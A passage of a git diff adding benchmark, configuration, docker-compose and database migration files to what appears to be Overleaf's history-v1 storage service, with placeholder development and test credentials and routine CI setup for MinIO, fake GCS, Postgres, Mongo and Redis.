seconds we should check + * @return {{endDate: Date, startDate: Date}} + */ +export function getDatesBeforeRPO(offset) { + const now = new Date() + const endDate = new Date(now.getTime() - RPO) + return { + endDate, + startDate: new Date(endDate.getTime() - offset * 1000), + } +} diff --git a/services/history-v1/benchmarks/blob_store.js b/services/history-v1/benchmarks/blob_store.js new file mode 100644 index 0000000..9efad87 --- /dev/null +++ b/services/history-v1/benchmarks/blob_store.js @@ -0,0 +1,82 @@ +const crypto = require('node:crypto') +const benny = require('benny') +const { Blob } = require('overleaf-editor-core') +const mongoBackend = require('../storage/lib/blob_store/mongo') +const postgresBackend = require('../storage/lib/blob_store/postgres') +const cleanup = require('../test/acceptance/js/storage/support/cleanup') + +const MONGO_PROJECT_ID = '637386deb4ce3c62acd3848e' +const POSTGRES_PROJECT_ID = '123' + +async function run() { + for (const blobCount of [1, 10, 100, 1000, 10000, 100000, 500000]) { + await cleanup.everything() + const blobs = createBlobs(blobCount) + await insertBlobs(blobs) + const randomHashes = getRandomHashes(blobs, 100) + await benny.suite( + `Read a blob in a project with ${blobCount} blobs`, + benny.add('Mongo backend', async () => { + await mongoBackend.findBlob(MONGO_PROJECT_ID, randomHashes[0]) + }), + benny.add('Postgres backend', async () => { + await postgresBackend.findBlob(POSTGRES_PROJECT_ID, randomHashes[0]) + }), + benny.cycle(), + benny.complete() + ) + await benny.suite( + `Read 100 blobs in a project with ${blobCount} blobs`, + benny.add('Mongo backend', async () => { + await mongoBackend.findBlobs(MONGO_PROJECT_ID, randomHashes) + }), + benny.add('Postgres backend', async () => { + await postgresBackend.findBlobs(POSTGRES_PROJECT_ID, randomHashes) + }), + benny.cycle(), + benny.complete() + ) + await benny.suite( + `Insert a blob in a project with ${blobCount} blobs`, + benny.add('Mongo backend', async () => { + const [newBlob] = createBlobs(1) + await mongoBackend.insertBlob(MONGO_PROJECT_ID, newBlob) + }), + benny.add('Postgres backend', async () => { + const [newBlob] = createBlobs(1) + await postgresBackend.insertBlob(POSTGRES_PROJECT_ID, newBlob) + }), + benny.cycle(), + benny.complete() + ) + } +} + +function createBlobs(blobCount) { + const blobs = [] + for (let i = 0; i < blobCount; i++) { + const hash = crypto.randomBytes(20).toString('hex') + blobs.push(new Blob(hash, 42, 42)) + } + return blobs +} + +async function insertBlobs(blobs) { + for (const blob of blobs) { + await Promise.all([ + mongoBackend.insertBlob(MONGO_PROJECT_ID, blob), + postgresBackend.insertBlob(POSTGRES_PROJECT_ID, blob), + ]) + } +} + +function getRandomHashes(blobs, count) { + const hashes = [] + for (let i = 0; i < count; i++) { + const index = Math.floor(Math.random() * blobs.length) + hashes.push(blobs[index].getHash()) + } + return hashes +} + +module.exports = run diff --git a/services/history-v1/benchmarks/index.js b/services/history-v1/benchmarks/index.js new file mode 100644 index 0000000..5cc5baf --- /dev/null +++ b/services/history-v1/benchmarks/index.js @@ -0,0 +1,17 @@ +const testSetup = require('../test/setup') +const blobStoreSuite = require('./blob_store') + +async function main() { + await testSetup.setupPostgresDatabase() + await testSetup.createGcsBuckets() + await blobStoreSuite() +} + +main() + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/buildscript.txt b/services/history-v1/buildscript.txt new file mode 100644 index 0000000..f3e029b --- /dev/null +++ b/services/history-v1/buildscript.txt @@ -0,0 +1,10 @@ +history-v1 +--dependencies=postgres,gcs,mongo,redis,s3 +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 +--tsconfig-extra-includes=backup-deletion-app.mjs,backup-verifier-app.mjs,backup-worker-app.mjs,api/**/*,migrations/**/*,storage/**/* diff --git a/services/history-v1/config/custom-environment-variables.json b/services/history-v1/config/custom-environment-variables.json new file mode 100644 index 0000000..d07ae29 --- /dev/null +++ b/services/history-v1/config/custom-environment-variables.json @@ -0,0 +1,104 @@ +{ + "databaseUrl": "HISTORY_CONNECTION_STRING", + "databaseUrlReadOnly": "HISTORY_FOLLOWER_CONNECTION_STRING", + "herokuDatabaseUrl": "DATABASE_URL", + "databasePoolMin": "DATABASE_POOL_MIN", + "databasePoolMax": "DATABASE_POOL_MAX", + "persistor": { + "backend": "PERSISTOR_BACKEND", + "s3": { + "key": "AWS_ACCESS_KEY_ID", + "secret": "AWS_SECRET_ACCESS_KEY", + "endpoint": "AWS_S3_ENDPOINT", + "pathStyle": "AWS_S3_PATH_STYLE", + "maxRetries": "S3_MAX_RETRIES", + "httpOptions": { + "timeout": "S3_TIMEOUT" + } + }, + "gcs": { + "deletedBucketSuffix": "GCS_DELETED_BUCKET_SUFFIX", + "unlockBeforeDelete": "GCS_UNLOCK_BEFORE_DELETE", + "endpoint": { + "apiEndpoint": "GCS_API_ENDPOINT", + "projectId": "GCS_PROJECT_ID" + }, + "retryOptions": { + "maxRetries": "GCS_MAX_RETRIES", + "idempotencyStrategy": "GCS_IDEMPOTENCY_STRATEGY" + } + }, + "fallback": { + "backend": "PERSISTOR_FALLBACK_BACKEND", + "buckets": "PERSISTOR_BUCKET_MAPPING" + } + }, + "backupPersistor": { + "keyEncryptionKeys": "BACKUP_KEY_ENCRYPTION_KEYS", + "s3SSEC": { + "key": "AWS_ACCESS_KEY_ID", + "secret": "AWS_SECRET_ACCESS_KEY", + "endpoint": "AWS_S3_ENDPOINT", + "pathStyle": "AWS_S3_PATH_STYLE", + "maxRetries": "BACKUP_S3_MAX_RETRIES", + "httpOptions": { + "timeout": "BACKUP_S3_TIMEOUT" + } + } + }, + "blobStore": { + "globalBucket": "OVERLEAF_EDITOR_BLOBS_BUCKET", + "projectBucket": "OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET" + }, + "chunkStore": { + "historyStoreConcurrency": "HISTORY_STORE_CONCURRENCY", + "bucket": "OVERLEAF_EDITOR_CHUNKS_BUCKET" + }, + "zipStore": { + "bucket": "OVERLEAF_EDITOR_ZIPS_BUCKET", + "zipTimeoutMs": "ZIP_STORE_ZIP_TIMEOUT_MS" + }, + "backupStore": { + "chunksBucket":"BACKUP_OVERLEAF_EDITOR_CHUNKS_BUCKET", + "deksBucket":"BACKUP_OVERLEAF_EDITOR_DEKS_BUCKET", + "globalBlobsBucket":"BACKUP_OVERLEAF_EDITOR_GLOBAL_BLOBS_BUCKET", + "projectBlobsBucket":"BACKUP_OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET" + }, + "healthCheckBlobs": "HEALTH_CHECK_BLOBS", + "healthCheckProjects": "HEALTH_CHECK_PROJECTS", + "backupRPOInMS": "BACKUP_RPO_IN_MS", + "minSoftDeletionPeriodDays": "MIN_SOFT_DELETION_PERIOD_DAYS", + "mongo": { + "uri": "MONGO_CONNECTION_STRING" + }, + "basicHttpAuth": { + "password": "STAGING_PASSWORD", + "oldPassword": "BASIC_HTTP_AUTH_OLD_PASSWORD" + }, + "jwtAuth": { + "key": "OT_JWT_AUTH_KEY", + "oldKey": "OT_JWT_AUTH_OLD_KEY", + "algorithm": "OT_JWT_AUTH_ALG" + }, + "clusterWorkers": "CLUSTER_WORKERS", + "maxFileUploadSize": "MAX_FILE_UPLOAD_SIZE", + "httpsOnly": "HTTPS_ONLY", + "httpRequestTimeout": "HTTP_REQUEST_TIMEOUT", + "redis": { + "queue": { + "host": "QUEUES_REDIS_HOST", + "password": "QUEUES_REDIS_PASSWORD", + "port": "QUEUES_REDIS_PORT" + }, + "history": { + "host": "HISTORY_REDIS_HOST", + "password": "HISTORY_REDIS_PASSWORD", + "port": "HISTORY_REDIS_PORT" + }, + "lock": { + "host": "REDIS_HOST", + "password": "REDIS_PASSWORD", + "port": "REDIS_PORT" + } + } +} diff --git a/services/history-v1/config/default.json b/services/history-v1/config/default.json new file mode 100644 index 0000000..5222b84 --- /dev/null +++ b/services/history-v1/config/default.json @@ -0,0 +1,43 @@ +{ + "persistor": { + "backend": "s3", + "s3": { + "signedUrlExpiryInMs": "1800000", + "maxRetries": "1", + "httpOptions": { + "timeout": "8000" + } + }, + "gcs": { + "signedUrlExpiryInMs": "1800000", + "deleteConcurrency": "50" + } + }, + "backupPersistor": { + "backend": "s3SSEC", + "s3SSEC": { + "maxRetries": "1", + "pathStyle": false, + "httpOptions": { + "timeout": "120000" + } + } + }, + "backupRPOInMS": "3600000", + "chunkStore": { + "historyStoreConcurrency": "4" + }, + "zipStore": { + "zipTimeoutMs": "360000" + }, + "hasProjectsWithoutHistory": false, + "minSoftDeletionPeriodDays": "90", + "maxDeleteKeys": "1000", + "useDeleteObjects": "true", + "clusterWorkers": "1", + "maxFileUploadSize": "52428800", + "databasePoolMin": "2", + "databasePoolMax": "10", + "httpsOnly": "false", + "httpRequestTimeout": "300000" +} diff --git a/services/history-v1/config/development.json b/services/history-v1/config/development.json new file mode 100644 index 0000000..9cd73c6 --- /dev/null +++ b/services/history-v1/config/development.json @@ -0,0 +1,49 @@ +{ + "databaseUrl": "postgres://postgres:postgres@postgres/write_latex_dev", + "persistor": { + "s3": { + "endpoint": "http://s3:8080", + "pathStyle": "true" + }, + "gcs": { + "unsignedUrls": "true", + "endpoint": { + "apiEndpoint": "http://fake-gcs:9090", + "projectId": "fake" + } + } + }, + "blobStore": { + "globalBucket": "overleaf-development-blobs", + "projectBucket": "overleaf-development-project-blobs" + }, + "chunkStore": { + "bucket": "overleaf-development-chunks" + }, + "zipStore": { + "bucket": "overleaf-development-zips" + }, + "backupStore": { + "chunksBucket":"overleaf-development-history-chunks", + "deksBucket":"overleaf-development-history-deks", + "globalBlobsBucket":"overleaf-development-history-global-blobs", + "projectBlobsBucket":"overleaf-development-history-project-blobs" + }, + "backupPersistor": { + "keyEncryptionKeys": "[{\"key\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\"salt\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"}]", + "s3SSEC": { + "ca": "[\"/certs/public.crt\"]" + } + }, + "useDeleteObjects": "false", + "mongo": { + "uri": "mongodb://mongo:27017/sharelatex" + }, + "basicHttpAuth": { + "password": "password" + }, + "jwtAuth": { + "key": "secureKey", + "algorithm": "HS256" + } +} diff --git a/services/history-v1/config/production.json b/services/history-v1/config/production.json new file mode 100644 index 0000000..23f836b --- /dev/null +++ b/services/history-v1/config/production.json @@ -0,0 +1,5 @@ +{ + "backupPersistor": { + "tieringStorageClass": "INTELLIGENT_TIERING" + } +} diff --git a/services/history-v1/config/test.json b/services/history-v1/config/test.json new file mode 100644 index 0000000..c38e28e --- /dev/null +++ b/services/history-v1/config/test.json @@ -0,0 +1,53 @@ +{ + "databaseUrl": "postgres://overleaf:overleaf@postgres/overleaf-history-v1-test", + "databaseUrlReadOnly": "postgres://read_only:password@postgres/overleaf-history-v1-test", + "persistor": { + "backend": "gcs", + "gcs": { + "unsignedUrls": "true", + "endpoint": { + "apiEndpoint": "http://gcs:9090", + "projectId": "fake" + } + } + }, + "blobStore": { + "globalBucket": "overleaf-test-blobs", + "projectBucket": "overleaf-test-project-blobs" + }, + "chunkStore": { + "bucket": "overleaf-test-chunks" + }, + "zipStore": { + "bucket": "overleaf-test-zips" + }, + "backupStore": { + "chunksBucket":"overleaf-test-history-chunks", + "deksBucket":"overleaf-test-history-deks", + "globalBlobsBucket":"overleaf-test-history-global-blobs", + "projectBlobsBucket":"overleaf-test-history-project-blobs" + }, + "backupPersistor": { + "keyEncryptionKeys": "[{\"key\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\"salt\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"}]", + "s3SSEC": { + "ca": "[\"/certs/public.crt\"]" + }, + "tieringStorageClass": "REDUCED_REDUNDANCY" + }, + "healthCheckBlobs": "[\"42/f70d7bba4ae1f07682e0358bd7a2068094fc023b\",\"000000000000000000000042/98d5521fe746bc2d11761edab5d0829bee286009\"]", + "healthCheckProjects": "[\"42\",\"000000000000000000000042\"]", + "backupRPOInMS": "360000", + "maxDeleteKeys": "3", + "useDeleteObjects": "false", + "mongo": { + "uri": "mongodb://mongo:27017/sharelatex" + }, + "basicHttpAuth": { + "password": "test" + }, + "jwtAuth": { + "key": "testtest", + "algorithm": "HS256" + }, + "maxFileUploadSize": "524288" +} diff --git a/services/history-v1/docker-compose.ci.yml b/services/history-v1/docker-compose.ci.yml new file mode 100644 index 0000000..06d5d55 --- /dev/null +++ b/services/history-v1/docker-compose.ci.yml @@ -0,0 +1,237 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + AWS_S3_ENDPOINT: https://minio:9000 + AWS_S3_PATH_STYLE: 'true' + AWS_ACCESS_KEY_ID: OVERLEAF_HISTORY_S3_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY: OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + volumes: + - ./test/acceptance/certs:/certs + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + postgres: + condition: service_healthy + certs: + condition: service_completed_successfully + minio: + condition: service_started + minio_setup: + condition: service_completed_successfully + gcs: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + redis: + image: redis + healthcheck: + test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + postgres: + image: postgres:10 + environment: + POSTGRES_USER: overleaf + POSTGRES_PASSWORD: overleaf + POSTGRES_DB: overleaf-history-v1-test + volumes: + - ./test/acceptance/pg-init/:/docker-entrypoint-initdb.d/ + healthcheck: + test: pg_isready --quiet + interval: 1s + retries: 20 + + certs: + image: node:20.18.2 + volumes: + - ./test/acceptance/certs:/certs + working_dir: /certs + entrypoint: sh + command: + - '-cex' + - | + if [ ! -f ./certgen ]; then + wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)" + chmod +x ./certgen + fi + if [ ! -f private.key ] || [ ! -f public.crt ]; then + ./certgen -host minio + fi + + minio: + image: minio/minio:RELEASE.2024-10-13T13-34-11Z + command: server /data + volumes: + - ./test/acceptance/certs:/root/.minio/certs + environment: + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + depends_on: + certs: + condition: service_completed_successfully + + minio_setup: + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + image: minio/mc:RELEASE.2024-10-08T09-37-26Z + volumes: + - ./test/acceptance/certs:/root/.mc/certs/CAs + entrypoint: sh + command: + - '-cex' + - | + sleep 1 + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD + mc mb --ignore-existing s3/overleaf-test-history-chunks + mc mb --ignore-existing s3/overleaf-test-history-deks + mc mb --ignore-existing s3/overleaf-test-history-global-blobs + mc mb --ignore-existing s3/overleaf-test-history-project-blobs + mc admin user add s3 \ + OVERLEAF_HISTORY_S3_ACCESS_KEY_ID \ + OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY + echo ' + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-chunks" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-chunks/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-deks" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-deks/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs/*" + } + ] + }' > policy-history.json + + mc admin policy create s3 overleaf-history policy-history.json + mc admin policy attach s3 overleaf-history \ + --user=OVERLEAF_HISTORY_S3_ACCESS_KEY_ID + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/history-v1/docker-compose.yml b/services/history-v1/docker-compose.yml new file mode 100644 index 0000000..f4c885d --- /dev/null +++ b/services/history-v1/docker-compose.yml @@ -0,0 +1,246 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + build: + context: ../.. + dockerfile: services/history-v1/Dockerfile + target: base + volumes: + - .:/overleaf/services/history-v1 + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/history-v1 + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + build: + context: ../.. + dockerfile: services/history-v1/Dockerfile + target: base + volumes: + - .:/overleaf/services/history-v1 + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + - ./test/acceptance/certs:/certs + working_dir: /overleaf/services/history-v1 + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + AWS_S3_ENDPOINT: https://minio:9000 + AWS_S3_PATH_STYLE: 'true' + AWS_ACCESS_KEY_ID: OVERLEAF_HISTORY_S3_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY: OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + postgres: + condition: service_healthy + certs: + condition: service_completed_successfully + minio: + condition: service_started + minio_setup: + condition: service_completed_successfully + gcs: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + + postgres: + image: postgres:10 + environment: + POSTGRES_USER: overleaf + POSTGRES_PASSWORD: overleaf + POSTGRES_DB: overleaf-history-v1-test + volumes: + - ./test/acceptance/pg-init/:/docker-entrypoint-initdb.d/ + healthcheck: + test: pg_isready --host=localhost --quiet + interval: 1s + retries: 20 + + certs: + image: node:20.18.2 + volumes: + - ./test/acceptance/certs:/certs + working_dir: /certs + entrypoint: sh + command: + - '-cex' + - | + if [ ! -f ./certgen ]; then + wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)" + chmod +x ./certgen + fi + if [ ! -f private.key ] || [ ! -f public.crt ]; then + ./certgen -host minio + fi + + minio: + image: minio/minio:RELEASE.2024-10-13T13-34-11Z + command: server /data + volumes: + - ./test/acceptance/certs:/root/.minio/certs + environment: + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + depends_on: + certs: + condition: service_completed_successfully + + minio_setup: + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + image: minio/mc:RELEASE.2024-10-08T09-37-26Z + volumes: + - ./test/acceptance/certs:/root/.mc/certs/CAs + entrypoint: sh + command: + - '-cex' + - | + sleep 1 + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD + mc mb --ignore-existing s3/overleaf-test-history-chunks + mc mb --ignore-existing s3/overleaf-test-history-deks + mc mb --ignore-existing s3/overleaf-test-history-global-blobs + mc mb --ignore-existing s3/overleaf-test-history-project-blobs + mc admin user add s3 \ + OVERLEAF_HISTORY_S3_ACCESS_KEY_ID \ + OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY + echo ' + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-chunks" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-chunks/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-deks" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-deks/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs/*" + } + ] + }' > policy-history.json + + mc admin policy create s3 overleaf-history policy-history.json + mc admin policy attach s3 overleaf-history \ + --user=OVERLEAF_HISTORY_S3_ACCESS_KEY_ID + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/history-v1/install_deps.sh b/services/history-v1/install_deps.sh new file mode 100755 index 0000000..4ce7223 --- /dev/null +++ b/services/history-v1/install_deps.sh @@ -0,0 +1,9 @@ +#!/bin/sh + +set -ex + +apt-get update + +apt-get install jq parallel --yes + +rm -rf /var/lib/apt/lists/* diff --git a/services/history-v1/knexfile.js b/services/history-v1/knexfile.js new file mode 100644 index 0000000..6bdf877 --- /dev/null +++ b/services/history-v1/knexfile.js @@ -0,0 +1,19 @@ +const config = require('config') + +const baseConfig = { + client: 'postgresql', + connection: config.herokuDatabaseUrl || config.databaseUrl, + pool: { + min: parseInt(config.databasePoolMin, 10), + max: parseInt(config.databasePoolMax, 10), + }, + migrations: { + tableName: 'knex_migrations', + }, +} + +module.exports = { + development: baseConfig, + production: baseConfig, + test: baseConfig, +} diff --git a/services/history-v1/migrations/20220228163642_initial.js b/services/history-v1/migrations/20220228163642_initial.js new file mode 100644 index 0000000..560dd22 --- /dev/null +++ b/services/history-v1/migrations/20220228163642_initial.js @@ -0,0 +1,80 @@ +/** + * This is the initial migration, meant to replicate the current state of the + * history database. If tables already exist, this migration is a noop. + */ + +exports.up = async function (knex) { + await knex.raw(` + CREATE TABLE IF NOT EXISTS chunks ( + id SERIAL, + doc_id integer NOT NULL, + end_version integer NOT NULL, + end_timestamp timestamp without time zone, + CONSTRAINT chunks_version_non_negative CHECK (end_version >= 0) + ) + `) + await knex.raw(` + CREATE UNIQUE INDEX IF NOT EXISTS index_chunks_on_doc_id_and_end_version + ON chunks (doc_id, end_version) + `) + + await knex.raw(` + CREATE TABLE IF NOT EXISTS old_chunks ( + chunk_id integer NOT NULL PRIMARY KEY, + doc_id integer NOT NULL, + end_version integer, + end_timestamp timestamp without time zone, + deleted_at timestamp without time zone + ) + `) + await knex.raw(` + CREATE INDEX IF NOT EXISTS index_old_chunks_on_doc_id_and_end_version + ON old_chunks (doc_id, end_version) + `) + + await knex.raw(` + CREATE TABLE IF NOT EXISTS pending_chunks ( + id SERIAL, + doc_id integer NOT NULL, + end_version integer NOT NULL, + end_timestamp timestamp without time zone, + CONSTRAINT chunks_version_non_negative CHECK (end_version >= 0) + ) + `) + await knex.raw(` + CREATE INDEX IF NOT EXISTS index_pending_chunks_on_doc_id_and_id + ON pending_chunks (doc_id, id) + `) + + await knex.raw(` + CREATE TABLE IF NOT EXISTS blobs ( + hash_bytes bytea NOT NULL PRIMARY KEY, + byte_length integer NOT NULL, + string_length integer, + global boolean, + CONSTRAINT blobs_byte_length_non_negative CHECK (byte_length >= 0), + CONSTRAINT blobs_string_length_non_negative + CHECK (string_length IS NULL OR string_length >= 0) + ) + `) + + await knex.raw(` + CREATE TABLE IF NOT EXISTS project_blobs ( + project_id integer NOT NULL, + hash_bytes bytea NOT NULL, + byte_length integer NOT NULL, + string_length integer, + PRIMARY KEY (project_id, hash_bytes), + CONSTRAINT project_blobs_byte_length_non_negative + CHECK (byte_length >= 0), + CONSTRAINT project_blobs_string_length_non_negative + CHECK (string_length IS NULL OR string_length >= 0) + ) + `) + + await knex.raw(`CREATE SEQUENCE IF NOT EXISTS docs_id_seq`) +} + +exports.down = async function (knex) { + // Don't do anything on the down migration +} diff --git a/services/history-v1/migrations/20221026201437_chunk_start_version.js b/services/history-v1/migrations/20221026201437_chunk_start_version.js new file mode 100644 index 0000000..4aed9bc --- /dev/null +++ b/services/history-v1/migrations/20221026201437_chunk_start_version.js @@ -0,0 +1,23 @@ +exports.up = async function (knex) { + await knex.raw(` + ALTER TABLE chunks ADD COLUMN start_version integer + `) + await knex.raw(` + ALTER TABLE pending_chunks ADD COLUMN start_version integer + `) + await knex.raw(` + ALTER TABLE old_chunks ADD COLUMN start_version integer + `) +} + +exports.down = async function (knex) { + await knex.raw(` + ALTER TABLE chunks DROP COLUMN start_version + `) + await knex.raw(` + ALTER TABLE pending_chunks DROP COLUMN start_version + `) + await knex.raw(` + ALTER TABLE old_chunks DROP COLUMN start_version + `) +} diff --git a/services/history-v1/migrations/20221027201324_unique_start_version.js b/services/history-v1/migrations/20221027201324_unique_start_version.js new file mode 100644 index 0000000..2d7885e --- /dev/null +++ b/services/history-v1/migrations/20221027201324_unique_start_version.js @@ -0,0 +1,41 @@ +exports.config = { + // CREATE INDEX CONCURRENTLY can't be run inside a transaction + // If this migration fails in the middle, indexes and constraints will have + // to be cleaned up manually. + transaction: false, +} + +exports.up = async function (knex) { + await knex.raw(` + ALTER TABLE chunks + ADD CONSTRAINT chunks_start_version_non_negative + CHECK (start_version IS 